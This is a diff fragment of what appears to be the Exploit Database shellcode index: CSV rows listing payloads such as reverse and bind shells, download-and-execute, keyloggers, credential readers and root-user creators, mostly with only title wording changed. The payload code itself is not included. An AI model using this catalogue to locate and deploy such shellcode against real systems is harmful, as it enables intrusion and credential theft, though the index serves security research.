18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
|
||||
18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
|
||||
18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
|
||||
18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0
|
||||
18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
|
||||
|
@ -15935,34 +15942,34 @@ id,file,description,date,author,platform,type,port
|
|||
21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
|
||||
21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
|
||||
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
|
||||
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
|
||||
40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
||||
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
|
||||
24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
|
||||
25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
|
||||
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
|
||||
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
|
||||
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
|
||||
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell Port 4444 Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
|
||||
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
|
||||
28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
|
||||
40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
|
||||
29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse Shell (192.168.1.177:31337) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
|
||||
40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind Shell TCP 4444 Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
|
||||
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator 'BroK3n' Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
|
||||
34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
|
||||
34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
|
||||
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
|
||||
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User 'ALI' & Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
|
||||
34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
|
||||
34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
|
||||
35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent & Alphanumeric execve(_/bin/sh\0__NULL_NULL); Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
|
||||
35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
|
||||
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
|
||||
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind Port 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
|
||||
35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
|
||||
35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0
|
||||
35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0
|
||||
35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0
|
||||
35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0
|
||||
35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0
|
||||
36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0
|
||||
36411,platforms/win_x86-64/shellcode/36411.txt,"Windows XP x86-64 - Download & Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86-64,shellcode,0
|
||||
36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
|
||||
36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
|
||||
36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
|
||||
|
@ -15971,14 +15978,14 @@ id,file,description,date,author,platform,type,port
|
|||
36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
|
||||
36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
|
||||
36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
|
||||
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
|
||||
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
|
||||
36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
|
||||
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
|
||||
36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
|
||||
36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
|
||||
36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
|
||||
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
|
||||
36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
|
||||
36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
|
||||
36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-Shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
|
||||
36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
|
||||
|
@ -16005,24 +16012,24 @@ id,file,description,date,author,platform,type,port
|
|||
37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
|
||||
37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0
|
||||
37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
|
||||
37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
|
||||
37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
|
||||
37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
|
||||
37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0
|
||||
38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
|
||||
38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
|
||||
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
|
||||
38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0
|
||||
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
|
||||
38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
|
||||
38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
|
||||
38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - Bind Port 4444/TPC Null-free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
|
||||
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
|
||||
38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
|
||||
38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
|
||||
38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
|
||||
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
|
||||
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell Port 31173 with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
|
||||
38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
|
||||
38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
|
||||
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0
|
||||
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0
|
||||
39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
|
||||
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
|
||||
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind Port 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
|
||||
39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
|
||||
39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
|
@ -16030,32 +16037,32 @@ id,file,description,date,author,platform,type,port
|
|||
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
|
||||
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
|
||||
39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
|
||||
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
|
||||
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
|
||||
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bindshell Port 5600 Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bindshell Port 5600 Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind Port 1472/TCP (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
|
||||
39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
|
||||
39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
|
||||
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
|
||||
39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
|
||||
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
|
||||
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
|
||||
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
|
@ -16078,9 +16085,9 @@ id,file,description,date,author,platform,type,port
|
|||
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
|
||||
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
|
||||
40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
|
||||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Netcat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
|
||||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh Bind Port 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse Port 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
|
@ -16094,7 +16101,7 @@ id,file,description,date,author,platform,type,port
|
|||
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
||||
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
||||
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind Port 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
|
||||
